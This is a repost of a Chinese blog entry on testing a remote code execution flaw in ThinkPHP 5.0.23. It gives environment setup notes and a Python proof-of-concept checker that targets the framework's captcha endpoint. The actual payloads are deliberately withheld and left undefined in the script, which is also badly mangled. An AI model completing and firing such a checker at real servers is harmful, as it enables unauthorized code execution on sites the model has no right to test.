分享web开发知识

注册/登录|最近发布|今日推荐

主页 IT知识网页技术软件开发前端开发代码编程运营维护技术分享教程案例
当前位置:首页 > 运营维护

ThinkPHP-5.0.23新的RCE漏洞测试和POC

发布时间:2023-09-06 02:29责任编辑:胡小海关键词:PHP

TP5新RCE漏洞



昨天又是周五,讨厌周五曝漏洞,还得又得加班,算了,还是先验证一波。新的TP5RCE,据说发现者因为上次的RCE,于是又审计了代码,结果发现的。TP5也成了万人轮啊。

测试



环境搭建


  • windows下phpstudy,然后下载tp5.0.23到相应的www目录下
  • linux,安装启动apache和php,下载tp5.0.23到相应www目录下
  • mac(本机) 启动apache, 下载tp5.0.23到/library/Webserver/Documents下

环境测试


漏洞验证

Payload在此不公开,圈内的人大家都在微信群里看到很多了


备注一个测试遇到的问题:在windows下phpstudy使用assert函数成功,但是在本机mac下不行,怀疑与php版本有关,win下是php5的,mac下是php7的。

漏洞poc


# -*- coding:utf-8 -*-"""ThinkPHP-5.0.23 RCE POCAuthor: b0b@c"""# import libs,modules,filesimport sysimport requests# global vars & settingsheaders = { ???"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:45.0) Gecko/20100101 Firefox/45.0",}# payload...# ?main functionif __name__ == "__main__": ???url = "%s/public/index.php?s=captcha" ???url = url%str(sys.argv[1]) ???response1 = requests.post(url,headers=headers,data=data1) ???response2 = requests.post(url,headers=headers,data=data2) ???response3 = requests.post(url,headers=headers,data=data3) ???if (response1.content.find("Configuration File (php.ini) Path") >= 0) or (response2.content.find("index.php") >= 0) or (response3.content.find("index.php") >= 0): ???????print "YES,It‘s Dangerous!@!" ???else: ???????print "No,It‘s Safety!@!"

ThinkPHP-5.0.23新的RCE漏洞测试和POC

原文地址:https://www.cnblogs.com/KevinGeorge/p/10261523.html

知识推荐

我的编程学习网——分享web前端后端开发技术知识。 垃圾信息处理邮箱 tousu563@163.com 网站地图
icp备案号 闽ICP备2023006418号-8 不良信息举报平台 互联网安全管理备案 Copyright 2023 www.wodecom.cn All Rights Reserved